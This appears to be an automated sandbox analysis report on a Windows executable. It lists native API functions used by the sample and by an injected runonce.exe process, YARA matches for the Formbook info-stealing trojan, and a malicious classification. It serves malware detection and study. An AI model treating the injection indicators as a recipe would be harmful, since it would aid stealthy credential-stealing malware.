        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732D50 NtWriteVirtualMemory,3_2_37732D50
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732DC0 NtAdjustPrivilegesToken,3_2_37732DC0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732DA0 NtReadVirtualMemory,3_2_37732DA0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732C50 NtUnmapViewOfSection,3_2_37732C50
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37733C30 NtOpenProcessToken,3_2_37733C30
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732C30 NtMapViewOfSection,3_2_37732C30
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732C20 NtSetInformationFile,3_2_37732C20
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732C10 NtOpenProcess,3_2_37732C10
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37732CF0 NtDelayExecution,3_2_37732CF0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C4570 NtSuspendThread,LdrInitializeThunk,5_2_050C4570
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C4260 NtSetContextThread,LdrInitializeThunk,5_2_050C4260
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2D10 NtQuerySystemInformation,LdrInitializeThunk,5_2_050C2D10
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2DA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_050C2DA0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2C30 NtMapViewOfSection,LdrInitializeThunk,5_2_050C2C30
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2C50 NtUnmapViewOfSection,LdrInitializeThunk,5_2_050C2C50
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2CF0 NtDelayExecution,LdrInitializeThunk,5_2_050C2CF0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2F00 NtCreateFile,LdrInitializeThunk,5_2_050C2F00
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2E00 NtQueueApcThread,LdrInitializeThunk,5_2_050C2E00
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2E50 NtCreateSection,LdrInitializeThunk,5_2_050C2E50
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2ED0 NtResumeThread,LdrInitializeThunk,5_2_050C2ED0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C29F0 NtReadFile,LdrInitializeThunk,5_2_050C29F0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2B00 NtQueryValueKey,LdrInitializeThunk,5_2_050C2B00
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2B10 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_050C2B10
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2B80 NtCreateKey,LdrInitializeThunk,5_2_050C2B80
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2B90 NtFreeVirtualMemory,LdrInitializeThunk,5_2_050C2B90
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2BC0 NtQueryInformationToken,LdrInitializeThunk,5_2_050C2BC0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2A10 NtWriteFile,LdrInitializeThunk,5_2_050C2A10
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2A80 NtClose,LdrInitializeThunk,5_2_050C2A80
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2AC0 NtEnumerateValueKey,LdrInitializeThunk,5_2_050C2AC0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C34E0 NtCreateMutant,LdrInitializeThunk,5_2_050C34E0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C38D0 NtGetContextThread,LdrInitializeThunk,5_2_050C38D0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2D50 NtWriteVirtualMemory,5_2_050C2D50
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2DC0 NtAdjustPrivilegesToken,5_2_050C2DC0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2C10 NtOpenProcess,5_2_050C2C10
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2C20 NtSetInformationFile,5_2_050C2C20
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2CD0 NtEnumerateKey,5_2_050C2CD0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2F30 NtOpenDirectoryObject,5_2_050C2F30
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2FB0 NtSetValueKey,5_2_050C2FB0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2E80 NtCreateProcessEx,5_2_050C2E80
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2EB0 NtProtectVirtualMemory,5_2_050C2EB0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2EC0 NtQuerySection,5_2_050C2EC0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C29D0 NtWaitForSingleObject,5_2_050C29D0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2B20 NtQueryInformationProcess,5_2_050C2B20
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2BE0 NtQueryVirtualMemory,5_2_050C2BE0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C2AA0 NtQueryInformationFile,5_2_050C2AA0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C3C30 NtOpenProcessToken,5_2_050C3C30
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C3C90 NtOpenThread,5_2_050C3C90
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_03117B60 NtDeleteFile,5_2_03117B60
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_03117BF0 NtClose,5_2_03117BF0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_03117A80 NtReadFile,5_2_03117A80
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_03117920 NtCreateFile,5_2_03117920
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_03117D40 NtAllocateVirtualMemory,5_2_03117D40
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 0_2_00403217 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403217
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 0_2_004063100_2_00406310
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 0_2_0040499C0_2_0040499C
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377027603_2_37702760
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770A7603_2_3770A760
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377B67573_2_377B6757
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377246703_2_37724670
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377AD6463_2_377AD646
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3779D62C3_2_3779D62C
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771C6003_2_3771C600
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377BF6F63_2_377BF6F6
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FC6E03_2_376FC6E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377736EC3_2_377736EC
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377BA6C03_2_377BA6C0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377006803_2_37700680
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377CA5263_2_377CA526
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377BF5C93_2_377BF5C9
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377B75C63_2_377B75C6
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377004453_2_37700445
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3776D4803_2_3776D480
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377BF3303_2_377BF330
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770E3103_2_3770E310
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F13803_2_376F1380
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377B124C3_2_377B124C
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376ED2EC3_2_376ED2EC
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3774717A3_2_3774717A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3779D1303_2_3779D130
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377C010E3_2_377C010E
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EF1133_2_376EF113
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771B1E03_2_3771B1E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377051C03_2_377051C0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377AE0763_2_377AE076
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377B70F13_2_377B70F1
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770B0D03_2_3770B0D0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F00A03_2_376F00A0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3773508C3_2_3773508C
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377BFF633_2_377BFF63
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770CF003_2_3770CF00
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37706FE03_2_37706FE0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377B1FC63_2_377B1FC6
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377BEFBF3_2_377BEFBF
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377A0E6D3_2_377A0E6D
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37720E503_2_37720E50
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37742E483_2_37742E48
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F2EE83_2_376F2EE8
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377B9ED23_2_377B9ED2
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37701EB23_2_37701EB2
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377B0EAD3_2_377B0EAD
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37700D693_2_37700D69
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377B7D4C3_2_377B7D4C
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377BFD273_2_377BFD27
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FAD003_2_376FAD00
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3779FDF43_2_3779FDF4
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37709DD03_2_37709DD0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37712DB03_2_37712DB0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37703C603_2_37703C60
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377B6C693_2_377B6C69
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377BEC603_2_377BEC60
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377AEC4C3_2_377AEC4C
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770AC203_2_3770AC20
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F0C123_2_376F0C12
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37787CE83_2_37787CE8
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771FCE03_2_3771FCE0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377CACEB3_2_377CACEB
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0515A5265_2_0515A526
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050904455_2_05090445
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_051467575_2_05146757
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0509A7605_2_0509A760
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050927605_2_05092760
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050AC6005_2_050AC600
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050B46705_2_050B4670
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050906805_2_05090680
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0514A6C05_2_0514A6C0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0508C6E05_2_0508C6E0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0515010E5_2_0515010E
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0513E0765_2_0513E076
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050800A05_2_050800A0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0509E3105_2_0509E310
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050522455_2_05052245
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0508AD005_2_0508AD00
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05090D695_2_05090D69
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050A2DB05_2_050A2DB0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05080C125_2_05080C12
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0509AC205_2_0509AC20
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0510EC205_2_0510EC20
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0513EC4C5_2_0513EC4C
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0514EC605_2_0514EC60
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05146C695_2_05146C69
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050A8CDF5_2_050A8CDF
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0515ACEB5_2_0515ACEB
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0509CF005_2_0509CF00
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0514EFBF5_2_0514EFBF
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05096FE05_2_05096FE0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050D2E485_2_050D2E48
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050B0E505_2_050B0E50
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05130E6D5_2_05130E6D
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05140EAD5_2_05140EAD
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05082EE85_2_05082EE8
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0508E9A05_2_0508E9A0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0514E9A65_2_0514E9A6
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050BE8105_2_050BE810
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_051308355_2_05130835
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050768685_2_05076868
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050A68825_2_050A6882
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0512C89F5_2_0512C89F
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050928C05_2_050928C0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05090B105_2_05090B10
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05104BC05_2_05104BC0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0514CA135_2_0514CA13
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0514EA5B5_2_0514EA5B
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05132AC05_2_05132AC0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_051475C65_2_051475C6
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0514F5C95_2_0514F5C9
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_051254905_2_05125490
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050FD4805_2_050FD480
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_051316235_2_05131623
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0512D62C5_2_0512D62C
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0513D6465_2_0513D646
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0514F6F65_2_0514F6F6
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_051036EC5_2_051036EC
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0507F1135_2_0507F113
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0512D1305_2_0512D130
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050D717A5_2_050D717A
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050951C05_2_050951C0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050AB1E05_2_050AB1E0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050C508C5_2_050C508C
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0509B0D05_2_0509B0D0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_051470F15_2_051470F1
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0514F3305_2_0514F330
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050813805_2_05081380
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0514124C5_2_0514124C
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0507D2EC5_2_0507D2EC
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0514FD275_2_0514FD27
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05147D4C5_2_05147D4C
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05099DD05_2_05099DD0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0512FDF45_2_0512FDF4
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05093C605_2_05093C60
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05129C985_2_05129C98
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050AFCE05_2_050AFCE0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05117CE85_2_05117CE8
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0510FF405_2_0510FF40
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0514FF635_2_0514FF63
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05133FA05_2_05133FA0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05141FC65_2_05141FC6
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05091EB25_2_05091EB2
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05149ED25_2_05149ED2
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050D59C05_2_050D59C0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050599E85_2_050599E8
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050938005_2_05093800
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_051058705_2_05105870
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0514F8725_2_0514F872
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050998705_2_05099870
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050AB8705_2_050AB870
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_051098B25_2_051098B2
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_051418DA5_2_051418DA
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_051478F35_2_051478F3
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050CDB195_2_050CDB19
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0514FB2E5_2_0514FB2E
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_05121B805_2_05121B80
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0514FA895_2_0514FA89
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_050AFAA05_2_050AFAA0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_031015405_2_03101540
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0311A0405_2_0311A040
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_030FC7395_2_030FC739
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_030FC7405_2_030FC740
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_030FC9605_2_030FC960
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_030FA9E05_2_030FA9E0
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_0310309C5_2_0310309C
        Source: C:\Windows\SysWOW64\runonce.exeCode function: 5_2_031030A05_2_031030A0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: String function: 3777EF10 appears 73 times
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: String function: 376EB910 appears 162 times
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: String function: 37747BE4 appears 66 times
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: String function: 3776E692 appears 75 times
        Source: C:\Windows\SysWOW64\runonce.exeCode function: String function: 050FE692 appears 86 times
        Source: C:\Windows\SysWOW64\runonce.exeCode function: String function: 0510EF10 appears 105 times
        Source: C:\Windows\SysWOW64\runonce.exeCode function: String function: 0507B910 appears 280 times
        Source: C:\Windows\SysWOW64\runonce.exeCode function: String function: 050D7BE4 appears 100 times
        Source: C:\Windows\SysWOW64\runonce.exeCode function: String function: 050C5050 appears 58 times
        Source: ulACwpUCSU.exe, 00000003.00000003.2981655894.00000000075B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRUNONCE.EXEj% vs ulACwpUCSU.exe
        Source: ulACwpUCSU.exe, 00000003.00000003.2923360317.0000000037642000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ulACwpUCSU.exe
        Source: ulACwpUCSU.exe, 00000003.00000002.3044601272.0000000037990000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ulACwpUCSU.exe
        Source: ulACwpUCSU.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000005.00000002.7370238315.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.7373754764.0000000004F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000006.00000002.7372491804.0000000001410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.3044504432.00000000373A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.7373930298.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.7373346387.00000000037A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/22@30/13
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 0_2_0040442A GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040442A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,0_2_00402036
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeFile created: C:\Users\user\AppData\Local\Lumbagoen.lnkJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeFile created: C:\Users\user\AppData\Local\Temp\nss2B7C.tmpJump to behavior
        Source: ulACwpUCSU.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: ulACwpUCSU.exeReversingLabs: Detection: 65%
